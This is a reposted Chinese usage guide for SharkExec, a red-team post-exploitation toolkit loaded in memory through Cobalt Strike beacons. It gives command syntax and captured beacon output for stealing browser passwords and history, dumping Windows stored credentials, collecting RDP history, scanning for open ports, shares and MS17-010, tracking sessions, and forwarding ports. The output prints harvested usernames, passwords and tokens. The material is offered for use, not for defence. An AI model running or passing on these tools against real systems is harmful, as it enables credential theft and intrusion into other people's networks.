内网渗透|红队工具|C#内存加载|cobaltstrike

C:SharkProExecSharkBrowserbinDebug>SharkBrowser.exe
    Usage:        .SharkBrowser.exe -p all
    Arguments:        -p        - all,Chrome,FireFox (<=57),        -h        - all,chrome,firefox,360es,360chrome,IE num        -f        - 360chrome    eg: SharkBrowser.exe -p all        SharkBrowser.exe -h all 100
beacon> shark browser credent all[*] Tasked beacon to run .NET program: SharkBrowser.exe -p all[+] host called home, sent: 698423 bytes[+] received output:[*]: Try to get  Chrome  Credential[*]: Try to get Fucku Chrome Credential[+] received output:[+]: URL:https://cmd5.com/login.aspx Username:[email protected] Password:qweqwe[*]: Get Fucku Chrome Credential End[*]: Try to get  FireFox  Credential[*]: Try to get Fucku FireFox  Credential[+]: found url:https://qianxin.webex.com.cn, Failed! to decrypt password[+]: found url:https://cmd5.com, Failed! to decrypt password[*]: Get Fucku FireFox  Credential end
beacon> shark browser history ie 4[*] Tasked beacon to run .NET program: SharkBrowser.exe -h ie 4[+] host called home, sent: 698425 bytes[+] received output:[*]: Try to get DESKTOP-NFGMGRPFucku IE Histroy num: 4[+]: Title: url:http://127.0.0.1:8080/t2/admin [+]: Title: url:http://127.0.0.1:8080/t2/login2?password=pass [+]: Title: url:http://sdjwxt.syu.edu.cn/jsxsd [+]: Title: url:http://cmd5.com/ [*]: Try to get DESKTOP-NFGMGRPFucku IE Histroy num:4 End

beacon> shark browser history chrome 5[*] Tasked beacon to run .NET program: SharkBrowser.exe -h chrome 5[+] host called home, sent: 698433 bytes[+] received output:[*]: Try to get  Chrome  Histroy count:5[*]: Try to get Fucku Chrome Histroy count:5[+] received output:[+]: Title:Aggressor Script Tutorial and Reference url:https://www.cobaltstrike.com/aggressor-script/beacon.html [*]: Get Fucku Chrome Histroy End

C:SharkProExecSharkCredentialsbinDebug>SharkCredentials.exe
    Usage:        .SharkCredentials.exe -c all    Arguments:         -c        - all,web,windows    eg: SharkCredentials.exe -c web        SharkCredentials.exe all

beacon> shark credent win x64[*] Tasked beacon to run .NET program: SharkCredentials_x64.exe -c windows[+] host called home, sent: 862783 bytes[+] received output:*: Try to get Windows Credentials[+] received output:[+]: OWNER:Fucku TARGET:LegacyGeneric:target=git:https://github.com USERNAME:LegacyGeneric:target=git:https://github.com PASSWORD:Test TIME:Test.[+]: OWNER:Fucku TARGET:LegacyGeneric:target=TERMSRV/192.168.47.128 USERNAME:LegacyGeneric:target=TERMSRV/192.168.47.128 PASSWORD:DESKTOP-NFGMGRPadministrator TIME:[+]: OWNER:Fucku TARGET:LegacyGeneric:target=MicrosoftAccount:user=Testgitc@163.com USERNAME:LegacyGeneric:target=MicrosoftAccount:user=Testgitc@163.com PASSWORD:Testgitc@163.com TIME:[+]: OWNER:Fucku TARGET:WindowsLive:target=virtualapp/didlogical USERNAME:WindowsLive:target=virtualapp/didlogical PASSWORD:02uoxmeoatckoqhf TIME:[+]: OWNER:Fucku TARGET:LegacyGeneric:target=OneDrive USERNAME:LegacyGeneric:target=OneDrive PASSWORD:154c3c5bcf361ef6 TIME:4d 43 51 4c 7a 6e 54 74 5a 67 43 79 4f 63 79 77 31 35 38 63 52 75 67 38 6c 5a 42 44 69 6c 72 74 6f 57 62 44 32 43 72 68 6f 6b 6c 72 7a 70 6e 57 63 53 31 71 52 74 2a 64 4b 59 33 53 59 32 59 65 75 33 53 49 73 55 35 31 77 4d 52 51 59 45 76 4c 4d 30 39 49 4a 68 4f 2a 77 41 78 6f 4d 31 65 32 41 44 46 4e 31 42 4a 30 68 46 78 79 4c 36 4f 33 38 7a 58 6f 47 65 65 38 78 70 75 51 45 37 62 64 51 57 42 69 73 63 64 75 47 62 50 77 61 43 46 4a 43 77 50 46 33 32 71 54 4c 38 55 53 66 41 78 6d 45 39 76 47 4a 34 78 61 48 65 5a 62 4d 49 6e 57 4d 4a 38 6c 54 72 55 66 64 65 50 5a 59 4c 56 77 54 57 7a 4a 41 6c 78 46 2a 70 52 62 49 43 6f 7a 45 4a 32 57 37 74 58 53 44 63 65 4e 47 4b 39 77 6f 2a 34 73 57 46 55 43 74 45 4b 7a 6a 54 62 34 75 53 38 67 76 6a 55 42 54 48 59 66 75 5a 48 2a 2a 4b 4a 55 75 71 49 34 44 73 6d 38 6c 6e 6b 4e 21 44 34 69 31 77 77 6f 77 4c 67 5a 62 79 6c 58 6a 63 74 2a 2a 6f 78 66 6c 55 6b 34 48 54 39 2a 79 64 53 4f 64 56 37 64 30 77 4c 73 6f 4e 38 50 55 30 4f 36 56 38 48 4a 52 74 55 51 69 21 71 6a 46 38 45 78 67 30 74 7a 6b 6a 70 7a 31 6f 44 6f 4b 6b 49 39 33 56 70 61 58 39 21 4e 6e [+]: OWNER:Fucku TARGET:LegacyGeneric:target=ｑｑｑ USERNAME:LegacyGeneric:target=ｑｑｑ PASSWORD:ｑｑｑ TIME:wqqq[+]: OWNER:Fucku TARGET:Domain:target=１１ USERNAME:Domain:target=１１ PASSWORD:１１ TIME:11*: Try to get Windows Credentials end

C:SharkProExecSharkDumpbinDebug>SharkDump.exe
    Usage:        .SharkDump.exe -p tv    Arguments:        -p        tv
    eg: SharkDump.exe -p tv

C:SharkProExecSharkInfobinDebug>SharkInfo.exe
    Usage:        .SharkInfo.exe -a    Arguments:         -a         ip    eg: SharkInfo.exe -a ip

C:SharkProExecSharkMonitorbinDebug>SharkMonitor.exe

    Arguments:
        -t   Time interval per scan( default:3000)
    eg: SharkMonitor.exe -t 50000

C:SharkProExecSharkRdpSharkRdpbinDebug>SharkRdp.exe
    Usage:        .SharkRdp.exe -r all 10    Arguments:         -r        - all,log,mstsc default num :10    eg: SharkRdp.exe -r all        SharkRdp.exe -r mstsc 10
beacon> shark rdp all[*] Tasked beacon to run .NET program: SharkRdp.exe -r all [+] host called home, sent: 114233 bytes[+] received output:[*]: Try to get rdp log  num: 10[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP  IP:- [+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP  IP:- [+] received output:[+]: USERNAME: - DOAMIN:-  IP:- [+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP  IP:- [+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP  IP:- [+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP  IP:- [+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP  IP:- [+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP  IP:- [+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP  IP:- [+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP  IP:- [*]: Try to get DESKTOP-NFGMGRPFucku MSTSC Histroy num: 10[+]: 192.168.47.100[+]: 192.168.47.128[+]: 192.168.47.8[*]: Try to get DESKTOP-NFGMGRPFucku MSTSC Histroy num: 10 End

C:SharkProExecSharkScanbinDebug>SharkScan.exe
    Usage:        .SharkScan.exe action [-ips|-ipf] -p -tp -A -ping    Arguments:        action     port | alive | netshare| ms17010        -ips:      127.0.0.1-127.0.0.24 | 127.0.0.1/24 | 127.0.0.1,127.0.0.2        -ipf       c:host.txt        -p         80,8080|80-88        -tp        default 0        -A         get server name        -ping      ping
    eg: SharkScan.exe  port -ips 192.168.220.1/24 -p 30,31 -tp 10 -out D:12.txt        SharkScan.exe  ms17010 -ipf c:1.txt -out D:12.txt        SharkScan.exe  alive -ips 192.168.47.99-192.168.47.200 -out D:12.txt        SharkScan.exe  netshare -ips 192.168.47.99-192.168.47.200 -out D:12.txt

C:Debug>SharkScan.exe  port -ips 10.10.172.226/24  -p 445  -A[*] : Remove duplicate ip count: 253[*] : Ip Count:253 Port Count:1[*] : Start Scanning Port[+] : 10.10.172.18 445 hostname ad.cn Windows  10 Enterprise 6.3 10.10.172.18, 192.168.137.1

C:Debug>SharkScan.exe  netshare -ips 10.10.172.226/24 
[*] : Start Scanning NetShare[+] : \10.10.172.183F$ requirePassword[+] : \10.10.172.181share Available[+] : \10.10.172.183IPC$ UnAvailable[+] : \10.10.172.138print$ Available
C:Debug>SharkScan.exe  ms17010 -ips 10.10.172.226[*] : Remove duplicate ip count: 1[*] : Start Scanning Port[+] : 10.10.172.226 445[*] : Scan Port End[*] : Start Scanning MS17010[-] : 10.10.172.226 ms17010 Is  Vulnerable[*] : Scan MS17010 End

C:SharkProExecSharkSessionbinDebug>SharkSession.exe
    Usage:        .SharkSession.exe ip user -r time -out logfile
:       ip      192.168.1.111        -u     user1,user2        -l      show all        -r       6        -out    c;1.log    eg: SharkSession.exe 192.168.1.111        SharkSession.exe 192.168.1.111  -u user1,user2  -l  -r  6  -out C:1.txt

[*] Tasked beacon to run .NET program: SharkSession.exe 192.168.47.111      [+] host called home, sent: 119379 bytes[+] received output:[*] : Start Dump Session[+] received output:[*] : 2020/2/25 22:55:20 192.168.47.111 > cname \192.168.47.128 clinet liming[*] : Dump Session End

beacon> shark session 192.168.47.111 -u liming -r 5 -out c:userslimingsession2.txt[*] Tasked beacon to run .NET program: SharkSession.exe 192.168.47.111 -u liming -r 5 -out c:userslimingsession2.txt[+] host called home, sent: 119465 bytes[+] received output:[*] : Start Dump Session[+] received output:[+] : 2020/2/25 23:04:28 192.168.47.111 > cname \192.168.47.128 clinet liming

C:SharkProExecSharkToolsbinDebug>SharkTools.exe

    Arguments:
        -a        pf        -lp:      8081        -rh       123.1.1.1        -rp        8081
    eg: SharkTools.exe  -a pf -lp 8081 -rh 123.1.1.1 -rp 8081

C:SharkProExecSharkZipbinDebug>SharkZip.exe
    Usage:        .SharkZip.exe action type args    Arguments:        action     u|z        type       dir|file
    eg: SharkZip.exe u  d:\1.zip d:\file        SharkZip.exe z dir d:\files d:\1.zip        SharkZip.exe z file d:\1.txt d:1.zip

beacon> shark zip z file D:12.txt D:12.zip[*] Tasked beacon to run .NET program: SharkZip.exe z file D:12.txt D:12.zip[+] host called home, sent: 310879 bytes[+] received output:[+]: Zip to directory D:12.zip
beacon> shark zip u D:12.zip D:12[*] Tasked beacon to run .NET program: SharkZip.exe u D:12.zip D:12 [+] host called home, sent: 310863 bytes[+] received output:[+]: Unzip to directory D:12

转载：https://github.com/F3eev/SharkExec作者：F3eev欢迎大家去关注作者